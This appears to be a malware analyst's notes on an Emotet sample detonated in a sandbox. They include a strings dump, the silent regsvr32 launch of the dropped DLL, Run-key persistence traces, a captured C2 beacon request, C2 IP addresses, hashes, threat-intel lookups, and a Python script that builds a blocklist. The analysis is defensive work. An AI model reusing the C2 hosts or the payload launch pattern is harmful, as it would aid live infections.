Path=C:\Program Files\Microsoft Office 15\Root\Office15\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Python37\Scripts\;C:\Python37\;C:\Python27\;C:\Python27\Scripts;C:\ProgramData\Boxstarter;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\ProgramData\chocolatey\bin;C:\Program Files\Puppet Labs\Puppet\bin;C:\Program Files\OpenJDK\openjdk-11.0.13_8\bin;C:\Program Files\nodejs\;C:\Program Files\Microsoft VS Code\bin;C:\Users\bob\AppData\Local\Microsoft\WindowsApps;C:\Tools\Cmder;;C:\ProgramData\chocolatey\lib\radare2.flare\tools\radare2\bin;C:\Tools\java-deobfuscator-gui;C:\Tools\Bytecode-Viewer;C:\Program Files (x86)\Nmap;C:\ProgramData\chocolatey\lib\rawcap\tools\rawcap;C:\Tools\pyinstxtractor;C:\Tools\oledump;C:\Tools\rtfdump;C:\Tools\msoffcrypto-crack;C:\Program Files (x86)\pdfid;C:\Program Files (x86)\pdfparser;C:\pdfstreamdumper;C:\iDefense\SysAnalyzer;C:\Users\bob\AppData\Local\Programs\Fiddler;C:\Users\bob\AppData\Roaming\npm;C:\Program Files\Microsoft Office 15\root\Client
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 140 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=8c01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=FLARE$S$d$s$t$_$p$+$g
PSModulePath=C:\Users\bob\Documents\WindowsPowerShell\Modules
PUBLIC=C:\Users\Public
RAW_TOOLS_DIR=C:\Tools
SESSIONNAME=Console
SSLKEYLOGFILE=C:\Users\bob\Documents\ssl-keys.log
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\bob\AppData\Local\Temp
TMP=C:\Users\bob\AppData\Local\Temp
TOOL_LIST_DIR=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FLARE
TOOL_LIST_SHORTCUT=C:\Users\bob\Desktop\FLARE.lnk
USERDOMAIN=BOBS-PC
USERDOMAIN_ROAMINGPROFILE=BOBS-PC
USERNAME=bob
USERPROFILE=C:\Users\bob
VM_COMMON_DIR=C:\ProgramData\FEVM
windir=C:\Windows
_NT_SYMBOL_PATH=symsrv*symsrv.dll*C:\symbols*http://msdl.microsoft.com/download/symbols
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32
C:\Windows\SYSTEM32;C:\Windows\system;C:\Windows;
vI}m
C:\Users\bob\Desktop\
C:\Windows\SYSTEM32\apphelp.dll
vaoC
C:\Windows\System32\KERNEL32.DLL
\l#mW
C:\Windows\System32\KERNELBASE.dll
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
2
RC
TLt0
ApphelpDebug
C:\Windows\Temp\AslLog_ApphelpDebug_regsvr32.exe_1616.txt
. }$
TLtX
Apphelp
shimengstate
C:\Windows\Temp\AslLog_shimengstate_regsvr32.exe_1616.txt
ShimDebugLog
C:\Windows\Temp\AslLog_ShimDebugLog_regsvr32.exe_1616.txt
SHA1
Microsoft Primitive Provider
bcryptprimitives.dll
C:\Windows\SYSTEM32\AcLayers.dll
_NT_SYMBOL_PATH=symsrv*symsrv.dll*C:\symbols*http://msdl.microsoft.com/download/symbols
C:\Windows\System32\msvcrt.dll
JAVA_HOME=C:\Program Files\OpenJDK\openjdk-11.0.13_8
TOOL_LIST_DIR=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FLARE
USER32.dll
C:\Windows\System32\USER32.dll
enforcesigninglevelfordependentmodules
SSLKEYLOGFILE=C:\Users\bob\Documents\ssl-keys.log
TOOL_LIST_SHORTCUT=C:\Users\bob\Desktop\FLARE.lnk
C:\Windows\System32\win32u.dll
onlyallowcontrolflowguardenabledbinaries
GDI32.dll
<?xml version="1.0" encoding="utf-8"?>

<MATCHED_ENTRIES>

<EXE NAME="regsvr32.exe" ID="{c7a85eba-c2d1-41ec-c656-ca2c9221e354}" DBID="{11111111-1111-1111-1111-111111111111}"/>

</MATCHED_ENTRIES>

Query: "outnpny"
-----------------
Line 1918: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 2296: C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb
Line 2432: C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb
Line 13918: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16666: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16732: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16900: C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb
Line 17676: Emehnrnpmefb\outnpny.kzb
Line 18454: outnpny.kzb
Line 23167: C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb
Line 23831: outnpny.kzb

Query: "S-1-5-21-3461203602-4096304019-2269080069" - My system SID
--------------------------------------------------------------------
Line 1861: \REGISTRY\USER\S-1-5-21-3461203602-4096304019-2269080069-1003\SOFTWARE\Microsoft\Windows\Current
Line 1873: \REGISTRY\USER\S-1-5-21-3461203602-4096304019-2269080069-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\RunBags3Z\
Line 13942: \REGISTRY\USER\S-1-5-21-3461203602-4096304019-2269080069-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Line 13957: Y\USER\S-1-5-21-3461203602-4096304019-2269080069-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Line 17613: webcache_{031b98cf-4a69-4c31-ab42-fd9b3c199407}_S-1-5-21-3461203602-4096304019-2269080069-1003
Line 17618: webcache_{031b98cf-4a69-4c31-ab42-fd9b3c199407}_S-1-5-21-3461203602-4096304019-2269080069-1003
Line 17839: webcache_{031b98cf-4a69-4c31-ab42-fd9b3c199407}_S-1-5-21-3461203602-4096304019-2269080069-1003

Query: "nginx"
----------------
GET /mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP/1.1
Cookie: AaApNexnjBNTnQ=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXlsEniXCixpyq6O3fQAY/fmRl8hDyeSAa/4Fm2pZzBzG/Lu3Lbk5gYkHdQNGcpL+bfulIEI2spcKmLOIwPEzEIgj1uRfThDG+89PJVLsbiLKQDku4g==
Host: 217.182.143.248:8080
Connection: Keep-Alive
Cache-Control: no-cache

MSAFD Irda [IrDA]
MSAFD Tcpip [UDP/IPv6]
MSAFD L2CAP [Bluetooth]
8
HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Tue, 15 Mar 2022 02:01:31 GMT
Content-Type: text/html
Content-Length: 173
Connection: keep-alive

Query: "GET /"
-------------------
Line 17700: Host192.99.251.50 GET /GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq HTTP/1.1
Line 18664: GET /mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP/1.1

Artifacts
==========

OSINT
-----
https://tria.ge/220314-y191labhh9
https://tria.ge/220315-aj5gsaebg4
https://tria.ge/220315-qe56hsbec2
https://app.any.run/tasks/7000b947-2ab9-4e3b-bbcd-eba0c459af96
https://urlhaus.abuse.ch/browse.php?search=www.arkpp.com

IOCs
----
www[.]arkpp[.]com
146[.]59[.]226[.]45
61[.]61[.]127[.]68
185[.]4[.]135[.]27:8080
192[.]99[.]251[.]50
217[.]182[.]143[.]248:8080

URIs
----
185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
217.182.143.248:8080/pjUXpuZmP
217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR

File hashes
-----------
2022-03-14_1551.xlsm – 8e586a928eecac9fa5b4dd6980915389f0092c6ec968ffe90dc4ccf3504ae578
fbd.dll – a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22
Emehnrnpmefb/outnpny.kzb – a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22

Munin results
-------------
[ ] Processing /outnpny.kzb …
[ ] Processing /2022-03-14_1551.xlsm …
[ ] Processing /fbd.dll …
[+] Processing 3 lines …

1 / 3 > Suspicious
HASH: a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22 COMMENT: outnpny.kzb
VIRUS: Microsoft: Trojan:Win32/Sabsik.FL.B!ml / Kaspersky: VHO:Trojan-Banker.Win32.Convagent.gen
TYPE: Win32 DLL SIZE: 997.0 KB FILENAMES: XHtmlTreeTest.exe, emotet_exe_e4_a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22_2022-03-15__011320._exe
FIRST: 2022-03-15 01:13:22 LAST: 2022-03-15 01:13:22 SUBMISSIONS: 1 REPUTATION: 0
COMMENTS: 0 USERS: - TAGS: PEDLL
RESULT: 4 / 65

2 / 3 > Unknown
HASH: 8e586a928eecac9fa5b4dd6980915389f0092c6ec968ffe90dc4ccf3504ae578 COMMENT: 2022-03-14_1551.xlsm
RESULT: - / -

3 / 3 > Unknown
HASH: a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22 COMMENT: fbd.dll RULE: -
TYPE: - SIZE: 0 FILENAMES: -
FIRST: - LAST: - SUBMISSIONS: 0 REPUTATION: 0
COMMENTS: 0 USERS: - TAGS:
RESULT: 0 / 65
[!] Sample on ANY.RUN URL: https://any.run/report/a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22

Machinae results
----------------
********************************************************************************
* Information for arkpp.com
* Observable type: fqdn (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with --list-sites

[-] No URLVoid Results
[-] No URL Unshorten Results
[-] No Malc0de Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: ('2020-11-13', '61[.]61.127.68')
[-] pDNS data from VirusTotal: ('2019-11-06', '61[.]63.62.68')
[-] pDNS data from VirusTotal: ('2021-12-25', '91[.]195.240.87')
[-] No McAfee Threat Results

********************************************************************************
* Information for 146.59.226.45
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with --list-sites

[+] IP Whois Results
[-] ASN Information: ('16276', '146[.]59.0.0/16', '1994-03-08', 'ripencc', 'FR')
[-] Network Information: ('146[.]59.226.0/23', 'VPS-GRA8', '146[.]59.226.0 - 146[.]59.227.255')
[-] Registration Info: ('2020-10-22', '2020-10-22')
[-] Registration Locality: FR
[-] Abuse Email: abuse@ovh[.]net
[+] IPVoid Results
[-] Number of detections: 4
[-] IP Void Detection Rate: 4%
[-] Engines: ('Feodo Tracker', '(hXXps)://feodotracker[.]abuse[.]ch/')
[-] Engines: ('IPsum', 'hXXps://github[.]com/stamparm/ipsum')
[-] Engines: ('Redstout Threat IP list', '(hXXps)://www[.]redstout[.]com/index[.]html')
[-] Engines: ('Snapt NovaSense', 'hXXps://novasense-threats[.]com/')
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 2
[!] Error from RansomwareTracker: 503 Server Error: Backend unavailable, connection timeout for url: https://ransomwaretracker.abuse.ch/host/146.59.226.45
[-] No SANS Results
[!] Error from freegeoip.io: 403 Client Error: Forbidden for url: https://freegeoip.io/json/146.59.226.45
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: ('2022-03-11', 'vps-05aa197a.vps[.]ovh[.]net')
[-] pDNS malicious URLs from VirusTotal: ('2022-03-16', 'hXXps://146[.]59.226.45/')
    (the same 2022-03-16 entry is repeated 13 times in the tool output)
[-] pDNS malicious URLs from VirusTotal: ('2022-03-15', 'hXXps://146[.]59.226.45/')
    (the same 2022-03-15 entry is repeated 58 times in the tool output)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-09’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-08’, ‘hXXp://146[.]59.226.45:443/’)
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results
[-] No GreyNoise Results

********************************************************************************
* Information for 185.4.135.27
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************

[+] IP Whois Results
[-] ASN Information: (‘199246’, ‘185[.]4.132.0/22’, ‘2012-09-26’, ‘ripencc’, ‘GR’)
[-] Network Information: (‘185[.]4.132.0/22’, ‘GR-PAPAKI-20120926’, ‘185[.]4.132.0 – 185[.]4.135.255’)
[-] Registration Info: (‘2012-09-26’, ‘2020-07-20’)
[-] Registration Locality: GR
[-] Abuse Email: abuse@papaki[.]gr
[+] IPVoid Results
[-] Number of detections: 4
[-] IP Void Detection Rate: 4%
[-] Engines: (‘IPsum’, ‘hXXps://github[.]com/stamparm/ipsum’)
[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps)://www[.]redstout[.]com/index[.]html’)
[-] Engines: (‘S5hbl’, ‘(hXXp)://www.usenix[.]org[.]uk/content/rbl[.]html’)
[-] Engines: (‘Snapt NovaSense’, ‘hXXps://novasense-threats[.]com/’)
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2022-03-08’, ‘webmail[.]lybe[.]gr’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’) [22 identical entries]
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27:8080/’) [6 identical entries]
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://185[.]4.135.27:8080/’) [2 identical entries]
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps://185[.]4.135.27/’) [3 identical entries]
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps://185[.]4.135.27:8080/’) [2 identical entries]
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-09’, ‘hXXps://185[.]4.135.27:8080/’)
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results
[-] No GreyNoise Results

********************************************************************************
* Information for 192.99.251.50
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************

[+] IP Whois Results
[-] ASN Information: (‘16276’, ‘192[.]99.0.0/16’, ‘2013-06-17’, ‘arin’, ‘CA’)
[-] Network Information: (‘192[.]99.0.0/16’, ‘NET-192-99-0-0-1’, ‘OVH-ARIN-7’, ‘192[.]99.0.0 – 192[.]99.255.255’)
[-] Network Information: (‘192[.]99.251.48/29’, ‘NET-192-99-251-48-1’, ‘OVH-CUST-7087977’, ‘192[.]99.251.48 – 192[.]99.251.55’)
[-] Registration Info: (‘OVH Hosting, Inc.’, ‘2013-06-17’, ‘2013-06-17’)
[-] Registration Info: (‘Private Customer’, ‘2018-04-22’, ‘2018-04-22’)
[-] Registration Locality: (‘Montreal’, ‘QC’, ‘H3A 2N4’, ‘CA’)
[-] Registration Locality: (‘BENTONG’, ‘28700’, ‘MY’)
[-] Abuse Email: abuse@ovh[.]ca
[-] Tech Email: noc@ovh[.]net
[+] IPVoid Results
[-] Number of detections: 6
[-] IP Void Detection Rate: 7%
[-] Engines: (‘Barracuda_Reputation_BL’, ‘(hXXp)://www[.]barracudanetworks[.]com/’)
[-] Engines: (‘Feodo Tracker’, ‘(hXXps)://feodotracker[.]abuse[.]ch/’)
[-] Engines: (‘IPsum’, ‘hXXps://github[.]com/stamparm/ipsum’)
[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps)://www[.]redstout[.]com/index[.]html’)
[-] Engines: (‘S5hbl’, ‘(hXXp)://www.usenix[.]org[.]uk/content/rbl[.]html’)
[-] Engines: (‘Snapt NovaSense’, ‘hXXps://novasense-threats[.]com/’)
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://192[.]99.251.50/’) [8 identical entries]
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’) [92 identical entries]
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results
[-] No GreyNoise Results

********************************************************************************
* Information for 217.182.143.248
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************

[+] IP Whois Results
[-] ASN Information: (‘16276’, ‘217[.]182.0.0/16’, ‘2001-03-02’, ‘ripencc’, ‘FR’)
[-] Network Information: (‘217[.]182.0.0/16’, ‘FR-OVH-20010302’, ‘217[.]182.0.0 – 217[.]182.255.255’)
[-] Registration Info: (‘2017-02-20’, ‘2017-02-20’)
[-] Registration Locality: FR
[-] Abuse Email: abuse@ovh[.]net
[+] IPVoid Results
[-] Number of detections: 3
[-] IP Void Detection Rate: 3%
[-] Engines: (‘IPsum’, ‘hXXps://github[.]com/stamparm/ipsum’)
[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps)://www[.]redstout[.]com/index[.]html’)
[-] Engines: (‘Snapt NovaSense’, ‘hXXps://novasense-threats[.]com/’)
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 7
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’) [50 identical entries]
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’) [48 identical entries]
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://217[.]182.143.248:8080/’)
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results
[-] No GreyNoise Results

********************************************************************************
* Information for 8e586a928eecac9fa5b4dd6980915389f0092c6ec968ffe90dc4ccf3504ae578
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************

[+] VirusTotal File Report Results
[-] Date submitted: 2022-03-15 16:55:14
[-] Detected engines: 30
[-] Total engines: 60
[-] Scans: (‘DrWeb’, ‘X97M[.]DownLoader.929’)
[-] Scans: (‘MicroWorld-eScan’, ‘Trojan[.]Vita.6’)
[-] Scans: (‘FireEye’, ‘Trojan[.]Vita.6’)
[-] Scans: (‘CAT-QuickHeal’, ‘DOC[.]Emotet.45887’)
[-] Scans: (‘Sangfor’, ‘Malware.Generic-XLM[.]Save[.]ma35’)
[-] Scans: (‘Alibaba’, ‘TrojanDownloader:VBA/MalDoc[.]ali1000101’)
[-] Scans: (‘K7GW’, ‘Trojan ( 0058ce181 )’)
[-] Scans: (‘K7AntiVirus’, ‘Trojan ( 0058ce181 )’)
[-] Scans: (‘Arcabit’, ‘Trojan[.]Vita.6’)
[-] Scans: (‘Cyren’, ‘XLSM/Downldr.A[.]aggr!Camelot’)
[-] Scans: (‘ESET-NOD32’, ‘multiple detections’)
[-] Scans: (‘TrendMicro-HouseCall’, ‘TROJ_FRS[.]VSNTCE22’)
[-] Scans: (‘Avast’, ‘VBS:Malware-gen’)
[-] Scans: (‘Kaspersky’, ‘HEUR:Trojan.MSOffice[.]Emotet[.]gen’)
[-] Scans: (‘BitDefender’, ‘Trojan[.]Vita.6’)
[-] Scans: (‘Emsisoft’, ‘Trojan[.]Vita.6 (B)’)
[-] Scans: (‘TrendMicro’, ‘TROJ_FRS[.]VSNTCE22’)
[-] Scans: (‘McAfee-GW-Edition’, ‘X97M/Downloader[.]kj’)
[-] Scans: (‘Sophos’, ‘Troj/DocDl-AFRE’)
[-] Scans: (‘GData’, ‘Macro.Trojan-Downloader[.]Agent[.]BDH’)
[-] Scans: (‘Antiy-AVL’, ‘Trojan/Generic[.]ASMalwRG.167’)
[-] Scans: (‘Microsoft’, ‘TrojanDownloader:O97M/Emotet[.]PKCL!MTB’)
[-] Scans: (‘ZoneAlarm’, ‘HEUR:Trojan.MSOffice[.]Emotet[.]gen’)
[-] Scans: (‘AhnLab-V3’, ‘Downloader/XML[.]XlmMacro.S1774’)
[-] Scans: (‘McAfee’, ‘Downloader-FCHG!CAB6670DF74A’)
[-] Scans: (‘MAX’, ‘malware (ai score=85)’)
[-] Scans: (‘Zoner’, ‘Probably Heur.W97ShellN’)
[-] Scans: (‘Rising’, ‘Downloader[.]Agent/XLM!1.DC56 (CLASSIC)’)
[-] Scans: (‘Fortinet’, ‘MSExcel/Agent[.]DVP!tr’)
[-] Scans: (‘AVG’, ‘VBS:Malware-gen’)
[+] MetaDefender File Report Results
[-] Date submitted: 2022-03-15T17:04:08.882Z
[-] Detected engines: 6
[-] Total engines: 35
[-] Scans: (‘Cyren’, ‘XLSM/Downldr.A[.]aggr!Camelot’)
[-] Scans: (‘IKARUS’, ‘Trojan-Downloader[.]XLM[.]Agent’)
[-] Scans: (‘Kaspersky’, ‘HEUR:Trojan.MSOffice[.]Emotet[.]gen’)
[-] Scans: (‘McAfee’, ‘X97M/Downloader[.]kj’)
[-] Scans: (‘RocketCyber’, ”)
[-] Scans: (‘Sophos’, ‘Troj/DocDl-AFRE’)
[-] Scans: (‘Webroot SMD’, ”)
[-] Scans: (‘Jiangmin’, ‘Unavailable (production)’)
[-] Scans: (‘Scrutiny’, ”)
[-] Scans: (‘Vir[.]IT eXplorer’, ‘X97M[.]Emotet[.]DGN’)

********************************************************************************
* Information for a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************

[+] VirusTotal File Report Results
[-] Date submitted: 2022-03-15 01:13:22
[-] Detected engines: 4
[-] Total engines: 65
[-] Scans: (‘Kaspersky’, ‘VHO:Trojan-Banker.Win32[.]Convagent[.]gen’)
[-] Scans: (‘Antiy-AVL’, ‘Trojan/Generic[.]ASCommon.21F’)
[-] Scans: (‘Microsoft’, ‘Trojan:Win32/Sabsik[.]FL.B!ml’)
[-] Scans: (‘Rising’, ‘Trojan[.]Kryptik!8.8 (C64:YzY0Oh/jx0YklSUX)’)
[+] MetaDefender File Report Results
[-] Detected engines: 1
[-] Total engines: 1
[-] Scans: (‘Avira’, ‘TR/AD[.]Nekark.a6565a’)
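
The pDNS sections above repeat the same (date, URL) pair dozens of times per host, and every indicator is defanged (hXXp, [.]). The Python below is an added example, not part of the original post or its GitHub artifacts: it parses lines in that exact format, refangs them, collapses the duplicates into one summary per host (ports, schemes, first/last seen, hit count), and flattens the result to an ip:port denylist. The SAMPLE text is constructed from a handful of the lines above rather than the full dump; the function and variable names are my own.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in the shape of the pDNS lines in the dump above (both the
# plain quotes the tool emits and the curly quotes the blog rendered them as).
SAMPLE = """\
[-] pDNS malicious URLs from VirusTotal: ('2022-03-15', 'hXXps://185[.]4.135.27/')
[-] pDNS malicious URLs from VirusTotal: ('2022-03-15', 'hXXps://185[.]4.135.27/')
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-09’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-08’, ‘hXXp://146[.]59.226.45:443/’)
[-] No McAfee Threat Results
"""

# One pDNS record per line: a (date, url) tuple, quoted with ' or curly quotes.
LINE_RE = re.compile(
    r"pDNS malicious URLs from VirusTotal: \([‘'](?P<date>\d{4}-\d{2}-\d{2})[’'], "
    r"[‘'](?P<url>[^’']+)[’']\)"
)


def refang(indicator: str) -> str:
    """Undo the defanging used in the dump: hXXp(s):// -> http(s)://, [.] -> ."""
    indicator = re.sub(r"^hxxp", "http", indicator, flags=re.IGNORECASE)
    return indicator.replace("[.]", ".")


def parse_pdns(text: str) -> list:
    """Return [(date, refanged_url), ...] for every pDNS record line; other lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            records.append((m.group("date"), refang(m.group("url"))))
    return records


def dedupe(records: list) -> list:
    """Unique (date, url) pairs, sorted, which is what the raw dump fails to do."""
    return sorted(set(records))


def summarize(records: list) -> dict:
    """Collapse records into one entry per host: ports, schemes, first/last seen, hit count."""
    hosts = defaultdict(lambda: {"ports": set(), "schemes": set(),
                                 "first": None, "last": None, "hits": 0})
    for date, url in records:
        parts = urlsplit(url)
        # Explicit port wins; otherwise infer from the scheme. Note that the dump
        # contains plain http on 443, which is worth keeping visible.
        port = parts.port or (443 if parts.scheme == "https" else 80)
        info = hosts[parts.hostname]
        info["ports"].add(port)
        info["schemes"].add(parts.scheme)
        info["hits"] += 1
        # ISO dates sort correctly as strings.
        info["first"] = date if info["first"] is None or date < info["first"] else info["first"]
        info["last"] = date if info["last"] is None or date > info["last"] else info["last"]
    return dict(hosts)


def to_blocklist(summary: dict) -> list:
    """Flatten the summary to sorted 'ip:port' strings for a firewall or proxy denylist."""
    return sorted(f"{host}:{port}"
                  for host, info in summary.items() for port in info["ports"])


if __name__ == "__main__":
    recs = parse_pdns(SAMPLE)
    for host, info in summarize(recs).items():
        print(host, sorted(info["ports"]), sorted(info["schemes"]),
              info["first"], info["last"], f"{info['hits']} hits")
    print("\n".join(to_blocklist(summarize(recs))))
```

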